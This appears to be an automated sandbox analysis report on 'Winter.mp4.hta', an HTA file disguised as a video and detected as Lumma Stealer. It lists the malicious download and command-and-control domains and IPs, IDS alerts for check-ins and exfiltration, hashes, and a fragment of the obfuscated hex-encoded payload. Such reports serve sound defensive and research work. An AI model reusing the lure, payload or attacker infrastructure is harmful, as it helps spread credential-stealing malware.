http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn1.klipbazyxui.shop	powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoftkC0	powershell.exe, 00000002.00000002.2152519562.0000000007930000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crackerdolk.click/	powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/int_clp_sha.txts=Rc	powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-net	powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://cegu.shop/	powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://crackerdolk.click/r	powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000008.00000002.4465996133.0000000004C63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4465916292.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crackerdolk.click/api-	powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://crackerdolk.click/i	powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.3274235725.0000000004CD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipvumisui.shop/int_clp_sha.txtZR	powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-neti	powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://crackerdolk.click/wn	powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	powershell.exe, 00000004.00000002.3303123052.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2150261322.00000000061EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBjq	powershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2147721025.0000000005181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3274235725.0000000004B81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://crackerdolk.click/apiH	powershell.exe, 00000008.00000002.4466139663.0000000004C88000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://klipvumisui.shop/int_clp_sha.txt	powershell.exe, 00000008.00000002.4464750397.000000000071F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
104.21.72.190	cdn1.klipbazyxui.shop	United States	13335	CLOUDFLARENETUS	true
104.21.80.1	crackerdolk.click	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581902
Start date and time:	2024-12-29 09:22:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Winter.mp4.hta
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winHTA@9/6@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 90% Number of executed functions: 139 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .hta Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 2000 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6624 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:23:00	API Interceptor	93x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.161.251.21	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	@Setup.exe	Get hash	malicious	LummaC	Browse
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse
104.21.80.1	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	185.161.251.21
crackerdolk.click	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	rfWu0dUz6A.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Gabriel-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	172.67.165.100
	https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.html	Get hash	malicious	Unknown	Browse	104.21.77.48
	EjS7Q5fFCE.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.186.200
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	172.67.160.84
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	172.67.160.84
	aimware.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.132.55
	https://belasting.online-factuur.com	Get hash	malicious	Unknown	Browse	172.67.171.151
NTLGB	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	81.97.105.115
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	185.161.251.21
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	163.165.65.186
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	92.237.44.174
CLOUDFLARENETUS	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	rfWu0dUz6A.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Gabriel-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	172.67.165.100
	https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.html	Get hash	malicious	Unknown	Browse	104.21.77.48
	EjS7Q5fFCE.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.186.200
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	172.67.160.84
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	172.67.160.84
	aimware.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.132.55
	https://belasting.online-factuur.com	Get hash	malicious	Unknown	Browse	172.67.171.151

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	aYu936prD4.exe	Get hash	malicious	Unknown	Browse	104.21.72.190
	aYu936prD4.exe	Get hash	malicious	Unknown	Browse	104.21.72.190
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	104.21.72.190
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	104.21.72.190
	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	104.21.72.190
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	104.21.72.190
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	104.21.72.190
	lumma.ps1	Get hash	malicious	LummaC	Browse	104.21.72.190
	Titan.exe	Get hash	malicious	Unknown	Browse	104.21.72.190
	Titan.exe	Get hash	malicious	Unknown	Browse	104.21.72.190
a0e9f5d64349fb13191bc781f81f42e1	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	104.21.80.1 185.161.251.21
	rfWu0dUz6A.exe	Get hash	malicious	LummaC	Browse	104.21.80.1 185.161.251.21
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	104.21.80.1 185.161.251.21
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.80.1 185.161.251.21
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1 185.161.251.21
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	104.21.80.1 185.161.251.21
	!Set-up..exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1 185.161.251.21
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1 185.161.251.21
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1 185.161.251.21
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	104.21.80.1 185.161.251.21

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	5.425567665064823
Encrypted:	false
SSDEEP:	24:3KnWSKco4KmM6GjKbm51s4RPQoUebIKo+mZ9t7J0gt/NK3R8UHr8H8g:WWSU4YymI4RIoUeW+mZ9tK8NWR8WZg
MD5:	23BDC1228577C8247142F55D4FB7D3BA
SHA1:	109BF9F25AC85393295C6266504A824CAF9202E7
SHA-256:	96993857399EF5C4A7F5533BAD749D9B1FF7BA6ACBC2D3092F670FD6C9B5B552
SHA-512:	6A92414292C545CCF66AF3C4EFC8187A915B6F00A50235DE16EFAF3E77C0D1F540D1394FC485AD90ECE47834B114E937708A7423AAF6465233C8FFE74B349F38
Malicious:	false
Reputation:	low
Preview:	@...e.................................X..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sozcbzi.are.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihzgs2yc.idp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scexr12o.sg5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpfltxf2.w1n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	data
Entropy (8bit):	6.038915304329873
TrID:
File name:	Winter.mp4.hta
File size:	612'683 bytes
MD5:	dd408ffa842e697a71fa466966538cb4
SHA1:	2eeb41877f0eae3ea95de8981684955111f26255
SHA256:	84b473ab26ef4382c0ad60ad93b780e0564245f9b1fffe28a3248b0c7d2470cd
SHA512:	cb0e59732c50dd2787ffefd65d7e2e1b839dfe66b4eca1a0198dddde2e1165c72fe5e447a30923ff4376f04765cd7b8291e2ef5e1631e711a3f7b86d53e240e7
SSDEEP:	6144:Fg+kS4ewCXTL68uH/9ecepRCERj+ReiebqAAH:WV
TLSH:	F4D4C2465A73061598BCC964EED7CA2E2071BDCC4C0687AE4ACDB435305B8B47EE69FC
File Content Preview:	66E75W6eU63r74M69p6fN6eM20a63N65j57M64h68z45K28u41c4dj4ft63q29h7bT76O61b72a20X45A48j43U59v64N4cH3dY20U27c27i3bj66P6fq72i20Q28z76z61q72i20j5aY45A53B77T46A20f3de20I30a3bk5aH45t53R77o46p20d3cr20e41A4dc4fo63M2eW6cc65L6eM67s74K68a3bi20U5aY45s53r77z46z2bi2bB29v

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T09:25:06.266211+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49931	104.21.80.1	443	TCP
2024-12-29T09:25:07.120037+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49931	104.21.80.1	443	TCP
2024-12-29T09:25:07.120037+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49931	104.21.80.1	443	TCP
2024-12-29T09:25:08.457698+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49936	104.21.80.1	443	TCP
2024-12-29T09:25:10.370651+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49936	104.21.80.1	443	TCP
2024-12-29T09:25:10.370651+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49936	104.21.80.1	443	TCP
2024-12-29T09:25:11.939596+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49945	104.21.80.1	443	TCP
2024-12-29T09:25:14.357822+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49951	104.21.80.1	443	TCP
2024-12-29T09:25:16.688617+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49957	104.21.80.1	443	TCP
2024-12-29T09:25:19.173275+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49965	104.21.80.1	443	TCP
2024-12-29T09:25:21.274571+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49969	104.21.80.1	443	TCP
2024-12-29T09:25:22.289146+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49969	104.21.80.1	443	TCP
2024-12-29T09:25:23.555991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49975	104.21.80.1	443	TCP
2024-12-29T09:25:24.358688+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49975	104.21.80.1	443	TCP
2024-12-29T09:25:26.273390+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49982	185.161.251.21	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 09:23:10.417855978 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:10.417895079 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:10.417978048 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:10.459954023 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:10.459969044 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:11.721340895 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:11.721421003 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:11.724670887 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:11.724684000 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:11.724930048 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:11.733822107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:11.775340080 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.433583975 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.433640957 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.433675051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.433706045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.433733940 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.433739901 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.433768988 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.433789015 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.433805943 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.433810949 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.441481113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.442293882 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.442302942 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.449769974 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.450355053 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.450362921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.500905037 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.552892923 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.594655037 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.594664097 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.638259888 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.638326883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.638350964 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.646251917 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.646307945 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.646316051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.654094934 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.654191971 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.654238939 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.654247046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.654503107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.662055969 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.670049906 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.670093060 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.670100927 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.677906036 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.677953005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.677961111 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.685832977 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.685916901 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.685924053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.693852901 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:12.693906069 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:12.693912029 CET	443	49709	104.21.72.190	192.168.2.5
